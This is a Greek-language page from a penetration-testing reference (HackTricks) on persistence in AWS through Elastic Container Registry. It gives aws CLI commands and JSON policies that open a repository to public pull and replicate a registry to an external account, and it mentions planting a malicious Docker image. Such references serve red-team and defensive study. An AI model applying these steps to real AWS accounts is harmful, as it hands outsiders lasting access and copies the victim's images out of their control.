AWS - ECR Persistence

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

ECR

Για περισσότερες πληροφορίες ελέγξτε:

AWS - ECR Enum

Κρυφή Εικόνα Docker με Κακόβουλο Κώδικα

Ένας επιτιθέμενος θα μπορούσε να ανεβάσει μια εικόνα Docker που περιέχει κακόβουλο κώδικα σε ένα αποθετήριο ECR και να τη χρησιμοποιήσει για να διατηρήσει την επιμονή στον στόχο λογαριασμό AWS. Ο επιτιθέμενος θα μπορούσε στη συνέχεια να αναπτύξει την κακόβουλη εικόνα σε διάφορες υπηρεσίες εντός του λογαριασμού, όπως το Amazon ECS ή EKS, με διακριτικό τρόπο.

Πολιτική Αποθετηρίου

Προσθέστε μια πολιτική σε ένα μόνο αποθετήριο που να σας παραχωρεί (ή σε όλους) πρόσβαση σε ένα αποθετήριο:

aws ecr set-repository-policy \
--repository-name cluster-autoscaler \
--policy-text file:///tmp/my-policy.json

# With a .json such as

{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

Σημειώστε ότι το ECR απαιτεί οι χρήστες να έχουν άδεια να κάνουν κλήσεις στην ecr:GetAuthorizationToken API μέσω μιας πολιτικής IAM πριν μπορέσουν να αυθεντικοποιηθούν σε ένα μητρώο και να σπρώξουν ή να τραβήξουν οποιαδήποτε εικόνα από οποιοδήποτε αποθετήριο Amazon ECR.

Πολιτική Μητρώου & Διασυνοριακή Αναπαραγωγή

Είναι δυνατόν να αναπαράγετε αυτόματα ένα μητρώο σε έναν εξωτερικό λογαριασμό ρυθμίζοντας τη διασυνοριακή αναπαραγωγή, όπου πρέπει να υποδείξετε τον εξωτερικό λογαριασμό όπου θέλετε να αναπαραγάγετε το μητρώο.

Αρχικά, πρέπει να δώσετε στον εξωτερικό λογαριασμό πρόσβαση στο μητρώο με μια πολιτική μητρώου όπως:

aws ecr put-registry-policy --policy-text file://my-policy.json

# With a .json like:

{
"Sid": "asdasd",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::947247140022:root"
},
"Action": [
"ecr:CreateRepository",
"ecr:ReplicateImage"
],
"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
}

Τότε εφαρμόστε την παραμετροποίηση αναπαραγωγής:

aws ecr put-replication-configuration \
--replication-configuration file://replication-settings.json \
--region us-west-2

# Having the .json a content such as:
{
"rules": [{
"destinations": [{
"region": "destination_region",
"registryId": "destination_accountId"
}],
"repositoryFilters": [{
"filter": "repository_prefix_name",
"filterType": "PREFIX_MATCH"
}]
}]
}

Υποστήριξη HackTricks

Ελέγξτε τα σχέδια συνδρομής!
Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

PreviousAWS - EC2 Persistence NextAWS - ECS Persistence

Last updated 3 days ago